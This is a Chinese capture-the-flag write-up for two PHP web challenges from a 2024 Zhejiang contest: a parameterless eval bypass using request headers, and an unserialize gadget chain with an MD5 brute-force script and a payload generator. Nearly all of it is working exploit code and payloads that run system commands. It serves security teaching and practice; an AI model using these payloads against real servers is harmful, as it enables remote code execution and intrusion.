2024浙江省省赛决赛wp
rce
`<?php echo "get只接受code欧,flag在上一级目录<br>"; $filename = __FILE__; highlight_file($filename); if(isset($_GET['code'])){ if (!preg_match('/session_id\(|readfile\(/i', $_GET['code'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) { @eval($_GET['code']); } } else{ die("不让用session欧,readfile也不行"); } } ?>`
无参RCE，过滤了readfile和session_id方法，我用的是这个：

GET /1.php?code=eval(next(getallheaders())); HTTP/1.1
Host: 172.28.13.107
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: system('whoami');
比赛的时候不知道是不是Apache，这个方法只能在Apache下用。
用get_define_class也行，这个是通用的。
unserialize
<?php
# source (challenge as served)
// Show this file's own source to the player; the gadget classes below are the whole puzzle.
highlight_file(__FILE__);
// Disable all error reporting, so warnings raised while the gadget classes run are not shown.
error_reporting(0);
/**
 * Gadget class: destroying an instance emits $aear; when $aear is an object,
 * PHP stringifies it through __toString(), and this class's __toString()
 * invokes whatever callable is stored in $string. With unserialize() on
 * untrusted input both properties are attacker-chosen, which is why magic
 * methods must not act on deserialized state.
 */
class AAA
{
    public $aear;
    public $string;

    public function __construct($a)
    {
        $this->aear = $a;
    }

    /** Prints $aear (stringifying it via __toString() when it is an object). */
    public function __destruct()
    {
        print $this->aear;
    }

    /** Calls the value held in $string and hands back its result. */
    public function __toString()
    {
        return ($this->string)();
    }
}
/**
 * Gadget class: reading an inaccessible property (for example $pop from
 * outside the class) lands in __get(), which treats the property of that
 * name as an array and calls the element stored under the same key — a call
 * whose target is fully controlled by whoever populated the object.
 */
class BBB
{
    private $pop;

    public function __construct($string)
    {
        $this->pop = $string;
    }

    /** Looks up $this->{$value}[$value] and invokes it; the call's result is discarded. */
    public function __get($value)
    {
        $table = $this->$value;
        $callable = $table[$value];
        $callable();
    }
}
/**
 * Gadget class: string conversion calls ->add() on $bag (with errors
 * suppressed), and assigning any undeclared property reads ->tower on
 * $magazine, which fires __get() on whatever object $magazine holds.
 */
class DDD
{
    public $bag;
    public $magazine;

    /** Returns whatever $bag->add() yields; `@` hides the warning when $bag is not an object. */
    public function __toString()
    {
        return @$this->bag->add();
    }

    /** Tests $magazine->tower for truthiness and prints a marker when it holds. */
    public function __set($arg1, $arg2)
    {
        if (!$this->magazine->tower) {
            return;
        }
        echo "really??";
    }
}
class EEE{
// Gadget sink: __get() ends in eval() of the attacker-stored $f.
// The eval() branch is only reached when `$this->d[] = 1` evaluates falsy,
// which never happens for a real array (the assignment expression yields 1).
// The writeup drives it by deserializing $d as NAN, a non-array.
// NOTE(review): on PHP 7 an array write to a scalar only warns and the
// expression is null; PHP 8 throws an Error for that case — confirm against
// the PHP version the challenge ran on.
public $d=array();
public $e;
public $f;
public function __get($arg1){
// Both writes below target $d; with $d a non-array neither behaves as an append.
$this->d[$this->e]=1;
if ($this->d[]=1){
echo 'nononononnnn!!!';
}
else{
// FLAG: eval() of deserialized data — arbitrary code execution sink.
eval($this->f);
}
}
}
/**
 * Gadget class: any call to an inaccessible or undefined method lands in
 * __call(), which prints a marker and re-dispatches to "<name>haha", passing
 * the original argument list as one array. When no "...haha" method exists
 * the re-dispatch enters __call() again with the longer name.
 */
class FFF
{
    protected $cookie;

    /** Returns the stored cookie; protected, so callers outside the class hit __call() instead. */
    protected function delete()
    {
        return $this->cookie;
    }

    public function __call($func, $args)
    {
        $target = [$this, $func . 'haha'];
        echo 'hahahhhh';
        call_user_func($target, $args);
    }
}
/**
 * Gadget class: invoking the object compares md5(md5($book)) loosely with the
 * integer 666 and, on success, reads ->pen on $green, which fires __get() on
 * whatever object $green holds. The loose `==` is the weak link: a hex digest
 * is compared with an int, so the outcome depends on PHP's string-to-number
 * coercion rules rather than on an exact digest value.
 */
class GGG
{
    public $green;
    public $book;

    public function __invoke()
    {
        if (md5(md5($this->book)) != 666) {
            return null;
        }
        return $this->green->pen;
    }
}
// Deserialization sink: unserialize() on raw POST data instantiates any class
// above with attacker-chosen property values, so their magic methods
// (__destruct, __toString, __get, __set, __call, __invoke) run on that data.
// Defensive baseline: never unserialize() untrusted input; use a data-only
// format such as JSON, or at minimum pass ['allowed_classes' => false].
if(isset($_POST['UP'])) {
unserialize($_POST['UP']);
}
调用链为
AAA::__destruct()->AAA::__toString()->GGG::__invoke()->EEE::__get()
但是最后一个地方有一个判断，就是：
if ($this->d[]=1){
echo 'nononononnnn!!!';
}
要让这个判断为false，让d为NAN即可，我们做个实验：

再写个MD5爆破脚本
import hashlib
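def crack(pre, limit=999999):
    """Find integers whose double-MD5 hex digest starts with ``pre``.

    Mirrors the challenge check ``md5(md5($book)) == 666``: under loose
    comparison a digest whose leading characters coerce to the integer 666
    passes, so the search only needs a matching prefix, not a full digest.

    Args:
        pre: Prefix the hex digest must start with (compared as a string).
            The original slice was hard-coded to three characters; it now
            follows ``len(pre)`` so other prefix lengths work too.
        limit: Exclusive upper bound of the integers tried; the default keeps
            the original ``range(0, 999999)``.

    Returns:
        The matching integers in ascending order. Each is also printed as it
        is found, preserving the original script's output.
    """
    pre = str(pre)
    width = len(pre)
    hits = []
    for i in range(0, limit):
        inner = hashlib.md5(str(i).encode("UTF-8")).hexdigest()
        outer = hashlib.md5(inner.encode("UTF-8")).hexdigest()
        if outer[:width] == pre:
            print(i)
            hits.append(i)
    return hits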
crack("666")

<?php
# source — property-only stubs of the challenge classes, used below to serialize a payload locally
highlight_file(__FILE__);
// Disable error reporting for the remainder of this script.
error_reporting(0);
/** Stub of the challenge's AAA: same property names and constructor, no magic methods. */
class AAA
{
    public $aear;
    public $string;

    public function __construct($a)
    {
        $this->aear = $a;
    }
}
/** Stub of BBB; the private $pop keeps its class-mangled name when serialized. */
class BBB
{
    private $pop;
}
/** Stub of DDD: two public properties, no magic methods. */
class DDD
{
    public $bag;
    public $magazine;
}
/** Stub of EEE: $d defaults to an empty array exactly as in the challenge. */
class EEE
{
    public $d = [];
    public $e;
    public $f;
}
/** Stub of FFF; the protected $cookie serializes under the "*"-mangled name. */
class FFF
{
    protected $cookie;
}
/** Stub of GGG: two public properties, no magic methods. */
class GGG
{
    public $green;
    public $book;
}
// Assemble the object tree for the chain described above
// (AAA::__destruct -> AAA::__toString -> GGG::__invoke -> EEE::__get),
// serialize it, and URL-encode the result for use as the POST body.
$eee = new EEE();
$eee->d = NAN;              // per the writeup, a non-array $d makes the challenge's `$this->d[] = 1` check fail
$eee->e = NAN;
$eee->f = "system('whoami');";

$ggg = new GGG();
$ggg->green = $eee;         // object whose __get() is reached from GGG::__invoke()
$ggg->book = '213';         // value produced by the MD5 search for the `== 666` check

// NOTE(review): AAA::__construct() declares a required $a; on PHP >= 7.1 an
// argument-less `new AAA()` throws ArgumentCountError — confirm the PHP
// version this generator was run under.
$inner = new AAA();
$inner->string = $ggg;      // callable invoked by AAA::__toString()
$outer = new AAA($inner);   // emitted by __destruct(), which stringifies $inner

$payload = serialize($outer);
echo urlencode($payload);

